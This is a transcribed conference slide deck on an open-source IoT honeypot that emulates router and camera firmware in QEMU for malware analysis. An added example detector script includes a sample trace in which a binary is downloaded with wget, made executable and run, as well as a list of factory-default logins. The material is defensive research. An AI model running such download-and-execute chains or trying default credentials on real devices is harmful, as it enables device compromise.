SLIDE 1

NCSC One: IoT Honeypot

Pieter Jansen & Jurriaan Bremer

SLIDE 2

On the agenda:

1. Introduction
2. SBIR
3. Cuckoo Sandbox
4. Project
5. Architecture
6. Offline demo
7. Roadmap

SLIDE 3

Introduction

SLIDE 4

Pieter Jansen

  • CEO @ Cybersprint
  • https://cybersprint.com
  • Team of 25 enthusiasts
  • Since 2015
  • 100% Dutch
  • Digital Risk Protection services
SLIDE 5

Jurriaan Bremer

  • CEO, Hatching
  • https://hatching.io/
  • Lead Developer, Cuckoo Sandbox
  • https://cuckoosandbox.org/
  • 6+ years development on Cuckoo
  • Growing R&D team
SLIDE 6

SBIR

This SBIR project is co-funded by the Internal Security Fund of the European Union

Balancing Security and Mobility

SLIDE 7
SLIDE 8

SBIR

  • EU co-funded Project
  • SBIR stage 1 (feasibility)
  • SBIR stage 2 (realisation)
  • SBIR stage 3 (valorisation)
  • https://www.rvo.nl/subsidies-regelingen/sbir

You are here

SLIDE 9

Cuckoo Sandbox

SLIDE 10

Cuckoo Sandbox

  • Leading open source automated malware analysis project
  • https://cuckoosandbox.org/
  • Widely used throughout the security community
  • Hatching is the driving force behind the majority of Cuckoo innovations
  • Cuckoo forms basis of the IoT Honeypot project
SLIDE 11
SLIDE 12

Project

SLIDE 13
Project [1/2]

  • Goal: develop a firmware-based, open source Internet of Things (IoT) honeypot framework
  • Consumer network devices, e.g., those used by NCSC.NL personnel at home
  • IP cameras, smart devices, etc.
  • Reason: Mirai, Hajime, etc.

SLIDE 14
SLIDE 15

Hajime Botnet Makes a Comeback With Massive Scan for MikroTik Routers

SLIDE 16

Project overview - replication vs emulation

SLIDE 17

Replication-approach

1. Connect to an IoT device
2. Store the conversation (example: HTML files)
3. Spin up a service on the same port/protocol
4. Play back the earlier captured conversation

SLIDE 18

Replication-approach - conclusions

  • Easy to set up fake environments
  • Did not go past login screen
  • Was not convincing enough for attackers
  • Would only capture attempts, not infections

SLIDE 19

Project [2/2]

  • Replication alternative did not work
  • Goal: create open source IoT Honeypotting framework
  • Goal: detect large-scale IoT compromise campaigns
  • Goal: detect new threats, generate new IoCs
  • Default credentials, exploits, etc
  • Scales: run dozens of IoT devices using a single server
  • Without requiring the original hardware
  • Relatively low cost & maintenance effort

SLIDE 20

Existing projects

  • pyREbox, PANDA, DECAF, ISP RAS.
  • x86-only (pyREbox) and x86/ARM (PANDA, different use-case)
  • IoT firmware often ARM/MIPS/etc
SLIDE 21

High-level project overview

  • Emulate IoT firmware using QEMU
  • Expose listening network services
  • Either to internal networks or public IPv4 / IPv6 addresses
  • Instrument behavioral aspects of running firmware
  • Wait for device to be compromised!
SLIDE 22

Goal of the project?

  • Once a device is compromised, investigate :-)
  • Got system call traces and PCAPs
  • Reconstruct traffic to isolate exploit and/or payload
  • Alternative use-case: honey tokens
  • Intentionally vulnerable devices with interesting names (e.g., FREDERIKSKAZERNE CAM51)
  • Notifies owners if attackers abuse it
SLIDE 23

Architecture

SLIDE 24

IoT Honeypot Architecture

SLIDE 25

QEMU

Loading of firmware non-trivial:

  • In practice most firmware is non-x86: ARM & MIPS
  • Needs specific QEMU command-line parameters etc

Instrumentation of QEMU interesting:

  • Not much existing research on non-x86 QEMU VMI
  • Virtual Machine Introspection
  • Instrumentation required to learn what device is doing
  • E.g., logging system calls such as execve(2)
SLIDE 26

Gathering results

  • We obtain network traffic from the outside
  • We obtain system calls from the device
  • Realtime data processing
  • Results stored for later research
  • Alerts emitted to custom Dashboard
  • Known vulnerability was used
  • ...
SLIDE 27

QEMU command-line usage, MIPS image

/home/jbr/git/quailbox-qemu/build/mips-softmmu/qemu-system-mips \
    -kernel /home/jbr/.quailbox/kernels/vmlinux-3.18.120-4kc-malta-cuckoo \
    -nographic \
    -netdev tap,id=net0,ifname=tap_qemu,script=no,downscript=no \
    -M malta -m 512 \
    -hda /home/jbr/.quailbox/images/ext2fs-for-netgear-wnap210.image \
    -device e1000,netdev=net0 \
    -display none \
    -append "console=ttyS0 rw root=/dev/sda init=/sbin/init"

SLIDE 28

QEMU Tiny Code Generator (“TCG”)

  • Efficient engine for translating ARM/MIPS/etc into an IL
  • Intermediate Language
  • IL translated into the native Host code, e.g., x86
  • Needs customization to add our VMI
  • Syscall capturing for ARM+MIPS
  • Linux Kernel modifications & tracing WIP
  • Memory tracking & dumping logic
  • Additional changes required for new bug classes
  • Instrumentation for specific applications etc
SLIDE 29

Realtime tcpdump processing

  • Log & process HTTP(S) requests from the outside
  • Present network traffic to rule engines
  • Suricata / Snort
  • Cuckoo / Proprietary Signatures
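
The two streams from slides 26 and 29, system calls from the device and HTTP requests from the outside, turned into dashboard-style alerts as an added example (not code from the deck, Cuckoo or the honeypot project). The execve trace format, the HTTP log format, the default-credential list and every sample line are constructed assumptions; a real deployment would plug in its own trace parser.

```python
# Added example, not code from the deck, Cuckoo or the honeypot project: a minimal
# alerting pass over execve(2) traces from the emulated device and HTTP requests seen
# by tcpdump. Line formats, the default-credential list and all sample lines are constructed.
import re
import shlex
from urllib.parse import parse_qs
DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}
DEFAULT_CREDS = {("admin", "admin"), ("root", "root"), ("admin", "1234")}

# Constructed execve(2) trace, one call per line: "<ts> pid=<n> execve <argv...>"
SYSCALL_TRACE = """\
1532000003 pid=414 execve /usr/bin/wget http://203.0.113.7/x.mips
1532000004 pid=415 execve /bin/chmod +x x.mips
1532000005 pid=416 execve ./x.mips
"""
# Constructed HTTP log derived from tcpdump: "<src> <method> <path> [<form body>]"
HTTP_LOG = """\
198.51.100.9 GET /login.htm
198.51.100.9 POST /login.cgi username=admin&password=admin
198.51.100.23 POST /login.cgi username=admin&password=S3cret!
"""

def parse_execve(trace):
    """Yield (ts, pid, argv) per execve line; argv is shell-split."""
    for line in trace.splitlines():
        m = re.match(r"(\d+) pid=(\d+) execve (.*)", line)
        if m:
            yield int(m.group(1)), int(m.group(2)), shlex.split(m.group(3))

def download_then_execute(trace):
    """Alert when a file fetched by a downloader is later executed by name."""
    fetched, alerts = {}, []  # basename -> URL it was fetched from
    for ts, pid, argv in parse_execve(trace):
        prog = argv[0].rsplit("/", 1)[-1]
        if prog in DOWNLOADERS:
            fetched.update({u.rsplit("/", 1)[-1]: u for u in argv[1:] if "://" in u})
        elif prog in fetched:
            alerts.append(f"{ts} pid={pid} ran {prog} fetched from {fetched[prog]}")
    return alerts

def default_credential_logins(log):
    """Alert on login POSTs carrying a known factory-default credential."""
    alerts = []
    for line in log.splitlines():
        parts = line.split(" ", 3)
        if len(parts) == 4 and parts[1] == "POST" and "login" in parts[2]:
            form = parse_qs(parts[3])
            pair = (form.get("username", [""])[0], form.get("password", [""])[0])
            if pair in DEFAULT_CREDS:
                alerts.append(f"{parts[0]} used default credentials {pair[0]}:{pair[1]} on {parts[2]}")
    return alerts
```

The two alert lists are what a dashboard like the one on slide 26 would receive; stored alongside the PCAP and trace, they also mark where to start reconstructing the exploit or payload.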
SLIDE 30

Offline Demo

SLIDE 31
SLIDE 32
SLIDE 33
SLIDE 34
SLIDE 35

SLIDE 36

Roadmap

SLIDE 37

Roadmap

  • Create web interface for managing virtual IoT environments
  • “Load” support for many more firmware images
  • Tailored QEMU VMI support for:
  • Different CPU architectures
  • Different known versions of Linux kernel for allowing in-depth VMI
  • E.g., through Volatility / Rekall integration
  • Documentation of more relevant bug classes
  • Capability for identifying said bug classes
  • Protection against QEMU breakouts
  • Interaction through simulation of peripherals like camera/files/sensors
  • OT/SCADA/ICS applications (virtual Borssele)
  • So much more... ;-)
SLIDE 38

Valorization

SLIDE 39

Valorization: Commercial Applications

  • Fuzzing as a Service
  • Provide security testing services for hardware providers, allowing large-scale/automated testing for any firmware

  • Commercial / open source bespoke additions for specific use-cases
  • OT-applications, applications for non-standard firmware
  • Hosting of virtual IoT Environments
  • Creating virtual 'digital twin' of sensitive IoT environments for research purposes
  • Collect threat intelligence to support adversary attribution research
SLIDE 40

How you can help

1. Share your firmware
2. Provide testing grounds
3. Spread the word!

SLIDE 41

Credits

The HoneyNED project team

Andrei Costin (ancostin@jyu.fi), Assistant Professor in Cybersecurity/IoT, welcomes research and collaboration opportunities

SLIDE 42

Want to know more? Get in touch!

pj@cybersprint.com | jbr@hatching.io

Questions?